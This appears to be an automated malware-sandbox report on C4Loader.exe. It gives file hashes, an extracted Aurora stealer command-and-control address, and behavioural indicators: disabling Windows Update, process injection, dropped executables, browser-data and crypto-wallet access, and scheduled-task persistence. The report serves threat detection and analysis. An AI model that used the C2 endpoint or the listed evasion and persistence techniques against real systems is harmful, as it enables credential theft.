Analysis
-
max time kernel
134s -
max time network
153s -
platform
windows10-2004_x64 -
resource
win10v2004-20230220-en -
resource tags
arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system -
submitted
10-03-2023 21:50
Static task
static1
Behavioral task
behavioral1
Sample
C4Loader.exe
Resource
win7-20230220-en
General
-
Target
C4Loader.exe
-
Size
687.8MB
-
MD5
66a41bcddbef0ad226adda334fc38ae6
-
SHA1
3128d77a2d71d1fc520d302f2d6a12f0c3c47a09
-
SHA256
36f02f949c036b047e57b6319d246805a710ad119850988c70b7de96b139658a
-
SHA512
541fcd5bf78329a2ccf2ad722b63bcc749bc357911bcd1a15748774a054713096906835245486e85a4766a6960a4da0cb203cdf22e0a37471745c1a4d17b5dea
-
SSDEEP
3072:ZwiwPz+huH7liXb6QF45A6Nmn0+Q/ycdIwYioOAg0FujDgtNs1bDew:CiEoX2Qm5A10+QacpDAOIs1bDew
Malware Config
Extracted
aurora
107.182.129.73:8081
Signatures
-
Modifies security service 2 TTPs 5 IoCs
Processes:
reg.exedescription ioc process Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0 reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1 reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters reg.exe -
Suspicious use of NtCreateProcessExOtherParentProcess 10 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeDllHost.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exedescription pid process target process PID 1932 created 4776 1932 WerFault.exe DllHost.exe PID 3184 created 2416 3184 WerFault.exe DllHost.exe PID 4984 created 2464 4984 WerFault.exe DllHost.exe PID 5008 created 216 5008 WerFault.exe DllHost.exe PID 3820 created 3632 3820 DllHost.exe DllHost.exe PID 2704 created 4160 2704 WerFault.exe DllHost.exe PID 3916 created 4188 3916 WerFault.exe DllHost.exe PID 2908 created 3760 2908 WerFault.exe DllHost.exe PID 2236 created 3820 2236 WerFault.exe DllHost.exe PID 3168 created 2656 3168 WerFault.exe DllHost.exe -
Suspicious use of NtCreateUserProcessOtherParentProcess 18 IoCs
Processes:
SmartDefRun.exepowershell.EXEsvchost.exedescription pid process target process PID 2072 created 3160 2072 SmartDefRun.exe Explorer.EXE PID 2072 created 3160 2072 SmartDefRun.exe Explorer.EXE PID 2072 created 3160 2072 SmartDefRun.exe Explorer.EXE PID 2072 created 3160 2072 SmartDefRun.exe Explorer.EXE PID 5072 created 608 5072 powershell.EXE winlogon.exe PID 2468 created 2000 2468 svchost.exe DllHost.exe PID 2468 created 4776 2468 svchost.exe DllHost.exe PID 2468 created 4772 2468 svchost.exe DllHost.exe PID 2468 created 2416 2468 svchost.exe DllHost.exe PID 2468 created 2464 2468 svchost.exe DllHost.exe PID 2468 created 216 2468 svchost.exe DllHost.exe PID 2468 created 5052 2468 svchost.exe DllHost.exe PID 2468 created 3632 2468 svchost.exe DllHost.exe PID 2468 created 4160 2468 svchost.exe DllHost.exe PID 2468 created 4188 2468 svchost.exe DllHost.exe PID 2468 created 3760 2468 svchost.exe DllHost.exe PID 2468 created 3820 2468 svchost.exe DllHost.exe PID 2468 created 2656 2468 svchost.exe DllHost.exe -
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 27 212 powershell.exe -
Downloads MZ/PE file
-
Drops file in Drivers directory 1 IoCs
Processes:
SmartDefRun.exedescription ioc process File created C:\Windows\System32\drivers\etc\hosts SmartDefRun.exe -
Stops running service(s) 3 TTPs
-
Executes dropped EXE 5 IoCs
Processes:
C4Loader.exenew2.exeSysApp.exeSmartDefRun.exefodhelper.exepid process 4524 C4Loader.exe 4900 new2.exe 2864 SysApp.exe 2072 SmartDefRun.exe 2956 fodhelper.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Drops file in System32 directory 10 IoCs
Processes:
powershell.EXEsvchost.exesvchost.exepowershell.EXEsvchost.exedescription ioc process File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx svchost.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx svchost.exe File opened for modification C:\Windows\System32\Tasks\Telemetry Logging svchost.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 svchost.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log powershell.EXE File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.EXE.log powershell.EXE File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 svchost.exe -
Suspicious use of SetThreadContext 3 IoCs
Processes:
C4Loader.exeSmartDefRun.exepowershell.EXEdescription pid process target process PID 4892 set thread context of 2336 4892 C4Loader.exe RegSvcs.exe PID 2072 set thread context of 3864 2072 SmartDefRun.exe dialer.exe PID 5072 set thread context of 4716 5072 powershell.EXE dllhost.exe -
Drops file in Program Files directory 1 IoCs
Processes:
SmartDefRun.exedescription ioc process File created C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe SmartDefRun.exe -
Launches sc.exe 5 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exepid process 3988 sc.exe 2312 sc.exe 3376 sc.exe 2176 sc.exe 1904 sc.exe -
Program crash 17 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exepid pid_target process target process 2096 4892 WerFault.exe C4Loader.exe 1236 3524 WerFault.exe DllHost.exe 3920 3656 WerFault.exe DllHost.exe 1504 2000 WerFault.exe DllHost.exe 2236 4776 WerFault.exe DllHost.exe 2804 4772 WerFault.exe DllHost.exe 5000 2416 WerFault.exe DllHost.exe 4448 2464 WerFault.exe DllHost.exe 3976 216 WerFault.exe DllHost.exe 4944 3632 WerFault.exe DllHost.exe 3300 5052 WerFault.exe DllHost.exe 4876 4160 WerFault.exe DllHost.exe 316 4188 WerFault.exe DllHost.exe 3624 3760 WerFault.exe DllHost.exe 4080 3820 WerFault.exe DllHost.exe 3824 2656 WerFault.exe DllHost.exe 1396 2428 WerFault.exe -
Checks processor information in registry 2 TTPs 45 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Enumerates system info in registry 2 TTPs 30 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exedescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
powershell.EXEpowershell.EXEdescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exeSysApp.exeSmartDefRun.exepowershell.exepowershell.exepowershell.EXEpowershell.EXEdllhost.exesvchost.exepid process 212 powershell.exe 212 powershell.exe 2864 SysApp.exe 2864 SysApp.exe 2864 SysApp.exe 2864 SysApp.exe 2864 SysApp.exe 2864 SysApp.exe 2864 SysApp.exe 2864 SysApp.exe 2864 SysApp.exe 2864 SysApp.exe 2072 SmartDefRun.exe 2072 SmartDefRun.exe 2068 powershell.exe 2068 powershell.exe 2072 SmartDefRun.exe 2072 SmartDefRun.exe 2072 SmartDefRun.exe 2072 SmartDefRun.exe 1084 powershell.exe 1084 powershell.exe 2072 SmartDefRun.exe 2072 SmartDefRun.exe 5072 powershell.EXE 4448 powershell.EXE 5072 powershell.EXE 4448 powershell.EXE 5072 powershell.EXE 4716 dllhost.exe 4716 dllhost.exe 4716 dllhost.exe 4716 dllhost.exe 4716 dllhost.exe 4716 dllhost.exe 2468 svchost.exe 2468 svchost.exe 4716 dllhost.exe 4716 dllhost.exe 2468 svchost.exe 2468 svchost.exe 4716 dllhost.exe 4716 dllhost.exe 4716 dllhost.exe 4716 dllhost.exe 4716 dllhost.exe 4716 dllhost.exe 4716 dllhost.exe 4716 dllhost.exe 4716 dllhost.exe 4716 dllhost.exe 4716 dllhost.exe 4716 dllhost.exe 4716 dllhost.exe 4716 dllhost.exe 4716 dllhost.exe 4716 dllhost.exe 4716 dllhost.exe 4716 dllhost.exe 4716 dllhost.exe 4716 dllhost.exe 4716 dllhost.exe 4716 dllhost.exe 4716 dllhost.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
Explorer.EXEpid process 3160 Explorer.EXE -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exewmic.exeWMIC.exedescription pid process Token: SeDebugPrivilege 212 powershell.exe Token: SeIncreaseQuotaPrivilege 4616 wmic.exe Token: SeSecurityPrivilege 4616 wmic.exe Token: SeTakeOwnershipPrivilege 4616 wmic.exe Token: SeLoadDriverPrivilege 4616 wmic.exe Token: SeSystemProfilePrivilege 4616 wmic.exe Token: SeSystemtimePrivilege 4616 wmic.exe Token: SeProfSingleProcessPrivilege 4616 wmic.exe Token: SeIncBasePriorityPrivilege 4616 wmic.exe Token: SeCreatePagefilePrivilege 4616 wmic.exe Token: SeBackupPrivilege 4616 wmic.exe Token: SeRestorePrivilege 4616 wmic.exe Token: SeShutdownPrivilege 4616 wmic.exe Token: SeDebugPrivilege 4616 wmic.exe Token: SeSystemEnvironmentPrivilege 4616 wmic.exe Token: SeRemoteShutdownPrivilege 4616 wmic.exe Token: SeUndockPrivilege 4616 wmic.exe Token: SeManageVolumePrivilege 4616 wmic.exe Token: 33 4616 wmic.exe Token: 34 4616 wmic.exe Token: 35 4616 wmic.exe Token: 36 4616 wmic.exe Token: SeIncreaseQuotaPrivilege 4616 wmic.exe Token: SeSecurityPrivilege 4616 wmic.exe Token: SeTakeOwnershipPrivilege 4616 wmic.exe Token: SeLoadDriverPrivilege 4616 wmic.exe Token: SeSystemProfilePrivilege 4616 wmic.exe Token: SeSystemtimePrivilege 4616 wmic.exe Token: SeProfSingleProcessPrivilege 4616 wmic.exe Token: SeIncBasePriorityPrivilege 4616 wmic.exe Token: SeCreatePagefilePrivilege 4616 wmic.exe Token: SeBackupPrivilege 4616 wmic.exe Token: SeRestorePrivilege 4616 wmic.exe Token: SeShutdownPrivilege 4616 wmic.exe Token: SeDebugPrivilege 4616 wmic.exe Token: SeSystemEnvironmentPrivilege 4616 wmic.exe Token: SeRemoteShutdownPrivilege 4616 wmic.exe Token: SeUndockPrivilege 4616 wmic.exe Token: SeManageVolumePrivilege 4616 wmic.exe Token: 33 4616 wmic.exe Token: 34 4616 wmic.exe Token: 35 4616 wmic.exe Token: 36 4616 wmic.exe Token: SeIncreaseQuotaPrivilege 5032 WMIC.exe Token: SeSecurityPrivilege 5032 WMIC.exe Token: SeTakeOwnershipPrivilege 5032 WMIC.exe Token: SeLoadDriverPrivilege 5032 WMIC.exe Token: SeSystemProfilePrivilege 5032 WMIC.exe Token: SeSystemtimePrivilege 5032 WMIC.exe Token: SeProfSingleProcessPrivilege 5032 WMIC.exe Token: SeIncBasePriorityPrivilege 5032 WMIC.exe Token: SeCreatePagefilePrivilege 5032 WMIC.exe Token: SeBackupPrivilege 5032 WMIC.exe Token: SeRestorePrivilege 5032 WMIC.exe Token: SeShutdownPrivilege 5032 WMIC.exe Token: SeDebugPrivilege 5032 WMIC.exe Token: SeSystemEnvironmentPrivilege 5032 WMIC.exe Token: SeRemoteShutdownPrivilege 5032 WMIC.exe Token: SeUndockPrivilege 5032 WMIC.exe Token: SeManageVolumePrivilege 5032 WMIC.exe Token: 33 5032 WMIC.exe Token: 34 5032 WMIC.exe Token: 35 5032 WMIC.exe Token: 36 5032 WMIC.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
C4Loader.exeRegSvcs.exepowershell.exenew2.execmd.execmd.execmd.exeSmartDefRun.exepowershell.EXEdllhost.exedescription pid process target process PID 4892 wrote to memory of 2336 4892 C4Loader.exe RegSvcs.exe PID 4892 wrote to memory of 2336 4892 C4Loader.exe RegSvcs.exe PID 4892 wrote to memory of 2336 4892 C4Loader.exe RegSvcs.exe PID 4892 wrote to memory of 2336 4892 C4Loader.exe RegSvcs.exe PID 4892 wrote to memory of 2336 4892 C4Loader.exe RegSvcs.exe PID 2336 wrote to memory of 212 2336 RegSvcs.exe powershell.exe PID 2336 wrote to memory of 212 2336 RegSvcs.exe powershell.exe PID 2336 wrote to memory of 212 2336 RegSvcs.exe powershell.exe PID 212 wrote to memory of 4524 212 powershell.exe C4Loader.exe PID 212 wrote to memory of 4524 212 powershell.exe C4Loader.exe PID 212 wrote to memory of 4524 212 powershell.exe C4Loader.exe PID 212 wrote to memory of 4900 212 powershell.exe new2.exe PID 212 wrote to memory of 4900 212 powershell.exe new2.exe PID 212 wrote to memory of 2864 212 powershell.exe SysApp.exe PID 212 wrote to memory of 2864 212 powershell.exe SysApp.exe PID 212 wrote to memory of 2864 212 powershell.exe SysApp.exe PID 212 wrote to memory of 2072 212 powershell.exe SmartDefRun.exe PID 212 wrote to memory of 2072 212 powershell.exe SmartDefRun.exe PID 4900 wrote to memory of 4616 4900 new2.exe wmic.exe PID 4900 wrote to memory of 4616 4900 new2.exe wmic.exe PID 4900 wrote to memory of 3876 4900 new2.exe cmd.exe PID 4900 wrote to memory of 3876 4900 new2.exe cmd.exe PID 3876 wrote to memory of 5032 3876 cmd.exe WMIC.exe PID 3876 wrote to memory of 5032 3876 cmd.exe WMIC.exe 